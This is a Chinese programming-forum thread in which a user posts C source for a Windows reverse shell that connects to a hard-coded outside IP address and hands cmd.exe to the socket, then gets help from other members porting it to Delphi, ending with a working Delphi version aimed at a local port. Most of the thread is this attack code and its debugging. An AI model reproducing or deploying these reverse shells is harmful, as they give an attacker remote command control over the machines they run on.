问一个CreateProcess与Socket的问题（有源代码）(200分)

c++的源代码
一个C写的反弹SHELL
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib, "kernel32.lib")

void main(int argc,char *argv[])
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
//hSocket=socket(PF_INET, SOCK_STREAM,IPPROTO_TCP);
adik_sin.sin_family=AF_INET;
adik_sin.sin_port=htons(7788);
adik_sin.sin_addr.s_addr=inet_addr("218.85.133.22");
connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
si.cb=sizeof(si);
si.dwFlags=STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket;
//send(hSocket,'aaaa',strlen('aaaa'),0);
CreateProcess(NULL,"c://winnt//system32//cmd.exe",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
//ExitProcess(0);
Sleep(50000);


我转的DELPHI版本
var
wsadata:twsadata;
adik_sin:tsockaddrin;
//adik_sinsockaddr;
hSocket:tsocket;
SI:TStartUpInfo;
PI:TProcessInformation;
//buf:array[0..255] of char;
mess:string;
begin
wsastartup(makeword(2,0),wsadata);
adik_sin.sin_family:=AF_INET;
adik_sin.sin_addr.S_addr:=inet_addr('127.0.0.1');
adik_sin.sin_port:=htons(2005);
hSocket:=WSASocket(AF_INET,SOCK_STREAM,0,nil,0,0);
connect(hSocket,adik_sin,sizeof(adik_sin));
mess:='521';
memo1.Lines.Add(mess);
send(hSocket,mess,length(mess),0);
si.cb:=sizeof(si);
si.dwFlags:=STARTF_USESTDHANDLES;
si.hStdInput:=hSocket;
si.hStdOutput:=hSocket;
si.hStdError:=hSocket;
//getwindowsdirectory(buf,256);
//pchar(buf+'/system32/cmd.exe')
//CreateProcess(nil,'cmd.exe /k dir c:',nil,nil,True,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI);
CreateProcess('cmd.exe /k dir c:',nil,nil,nil,true,0,nil,nil,si,pI);


hSocket:=WSASocket(AF_INET,SOCK_STREAM,0,nil,0,0); 这句过不去 说找不到 WSASocket 郁闷~该引用什么？
CreateProcess('cmd.exe /k dir c:',nil,nil,nil,true,0,nil,nil,si,pI);
这个自然也问题重重啊
没想到转个代码这么费心
只不过是想实现一个远程的SHELL

不是把这个应该不是很难啊 ？

学习

富翁称号 总积分 本轮得分 专家分 本轮排名 总排名
hardware007 3954 345 2656 34 935

hardware007 有： 1个待答问题， 1个已答问题， 回答了： 163 个问题。 富翁笔记

这么强居然学习
大哥 辛苦一下 敲敲键盘
小弟在这里先谢过了。^-^

WinSock单元中没有该定义,你uses一下IdWinSock2吧,这个里面有.
要不,按IdWinSock2中的声明自己定义一下也行啊.

引用完是可以过了
但是adik_sin类型不对
在CONNECT过程中应该用psockaddr类型
那就换把 换成psockaddr类型的了
结果可好
adik_sin.sin_family:=AF_INET;
adik_sin.sin_addr.S_addr:=inet_addr('127.0.0.1');
adik_sin.sin_port:=htons(2005);
3句全有错误
[Warning] Unit1.pas(83): Variable 'adik_sin' might not have been initialized
还请各位富翁帮忙......

那个是个指针啊!你对这东西还不是很熟了.
将adik_sin声明为TSockAddr
然后在调用Connect时用@取址.

你可以使用WinSock单元的Connect,两个单元可以混用的.

东兰梦舞
太感谢了

疑问一。
那么我这样发出去的信息“521”
mess:='521';
memo1.Lines.Add(mess);
send(hSocket,mess,length(mess),0);

为什么这样接受回来的却是“減E”
memo1.Lines.Add(socket.ReceiveText);

疑问2
si.cb:=sizeof(si);
si.dwFlags:=STARTF_USESTDHANDLES;
si.hStdInput:=hSocket;
si.hStdOutput:=hSocket;
si.hStdError:=hSocket;
CreateProcess(nil,'cmd.exe /k dir c:',nil,nil,True,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI);
CreateProcess('cmd.exe /k dir c:',nil,nil,nil,true,0,nil,nil,si,pI);
我已经从新定义了CreateProcess的输入输出
按道理我监听2005可以得到
cmd.exe /k dir c: 的运行结果
可是根本没返回啊

1、你传参数错了，应该用
send(hSocket,mess[1],length(mess),0);
2、没做过，不了解。

uses Windows, WinSock;

Const
MAX_PROTOCOL_CHAIN = 7;
WSAPROTOCOL_LEN = 255;
type
WSAPROTOCOLCHAIN = record
ChainLen : Integer;
ChainEntries : array[0..MAX_PROTOCOL_CHAIN-1] of DWORD;
end;

WSAPROTOCOL_INFO = record
dwServiceFlags1 : DWORD;
dwServiceFlags2 : DWORD;
dwServiceFlags3 : DWORD;
dwServiceFlags4 : DWORD;
dwProviderFlags : DWORD;
ProviderId : TGUID;
dwCatalogEntryId: DWORD;
ProtocolChain : WSAPROTOCOLCHAIN;
iVersion : Integer;
iAddressFamily : Integer;
iMaxSockAddr : Integer;
iMinSockAddr : Integer;
iSocketType : Integer;
iProtocol : Integer;
iProtocolMaxOffset : Integer;
iNetworkByteOrder: Integer;
iSecurityScheme : Integer;
dwMessageSize : DWORD;
dwProviderReserved : DWORD;
szProtocol : array[0..WSAPROTOCOL_LEN] of WCHAR;
end;

function WSASocket(
af : Integer; ntype : Integer; protocol : Integer;
lpProtocolInfo : Pointer; g : DWORD; dwFlags : DWORD) : TSocket;
stdcall; external 'ws2_32.dll' name 'WSASocketW';

var
wsaData : TWSAData;
hSocket : TSocket;
si : TStartupInfo;
pi : _PROCESS_INFORMATION;
adik_sin : sockaddr_in;
begin
FillChar(adik_sin,0,sizeof(sockaddr_in));
FillChar(si,0,sizeof(STARTUPINFO));

WSAStartup(MAKEWORD(2,0),wsaData);

hSocket := WSASocket(AF_INET,SOCK_STREAM,0,nil,0,0);
//hSocket=socket(PF_INET, SOCK_STREAM,IPPROTO_TCP);
adik_sin.sin_family := AF_INET;
adik_sin.sin_port := htons(7788);
adik_sin.sin_addr.s_addr := inet_addr('127.0.0.1');
connect(hSocket, adik_sin,sizeof(adik_sin));
si.cb := sizeof(si);
si.dwFlags := STARTF_USESTDHANDLES;
si.hStdInput := si.hStdOutput;//=si.hStdError=(void *)hSocket;
//send(hSocket,'aaaa',strlen('aaaa'),0);
CreateProcess(nil,'cmd.exe',nil,nil,True,0,nil,nil,si,pi);
//ExitProcess(0);
Sleep(50000);
end.

555555555555555555555555555555
发几个汉字过去可以
可是就是返回不了CMD

感谢
自己改了一点就OK了
program Project1;

uses
Windows,
WinSock;

Const
MAX_PROTOCOL_CHAIN = 7;
WSAPROTOCOL_LEN = 255;
type
WSAPROTOCOLCHAIN = record
ChainLen : Integer;
ChainEntries : array[0..MAX_PROTOCOL_CHAIN-1] of DWORD;
end;

WSAPROTOCOL_INFO = record
dwServiceFlags1 : DWORD;
dwServiceFlags2 : DWORD;
dwServiceFlags3 : DWORD;
dwServiceFlags4 : DWORD;
dwProviderFlags : DWORD;
ProviderId : TGUID;
dwCatalogEntryId: DWORD;
ProtocolChain : WSAPROTOCOLCHAIN;
iVersion : Integer;
iAddressFamily : Integer;
iMaxSockAddr : Integer;
iMinSockAddr : Integer;
iSocketType : Integer;
iProtocol : Integer;
iProtocolMaxOffset : Integer;
iNetworkByteOrder: Integer;
iSecurityScheme : Integer;
dwMessageSize : DWORD;
dwProviderReserved : DWORD;
szProtocol : array[0..WSAPROTOCOL_LEN] of WCHAR;
end;

function WSASocket(af:Integer;ntype:Integer;protocol:Integer;lpProtocolInfoointer;gWORD;dwFlagsWORD):TSocket;stdcall; external 'ws2_32.dll' name 'WSASocketW';

var
wsaData : TWSAData;
hSocket : TSocket;
si : TStartupInfo;
pi : _PROCESS_INFORMATION;
adik_sin : sockaddr_in;
a:string;
begin
FillChar(adik_sin,0,sizeof(sockaddr_in));
FillChar(si,0,sizeof(STARTUPINFO));
WSAStartup(MAKEWORD(2,0),wsaData);
hSocket := WSASocket(AF_INET,SOCK_STREAM,0,nil,0,0);
adik_sin.sin_family := AF_INET;
adik_sin.sin_port := htons(2005);
adik_sin.sin_addr.s_addr := inet_addr('127.0.0.1');
connect(hSocket, adik_sin,sizeof(adik_sin));
si.cb := sizeof(si);
si.dwFlags:=STARTF_USESTDHANDLES;
si.hStdInput:=hSocket;
si.hStdOutput:=hSocket;
si.hStdError:=hSocket;
a:='爱你就等于爱自己';
send(hSocket,a[1],length(a),0);
CreateProcess(nil,'cmd.exe /k dir c:',nil,nil,True,NORMAL_PRIORITY_CLASS,nil,nil,si,pi);
//ExitProcess(0);
Sleep(500000);
end.

多人接受答案了。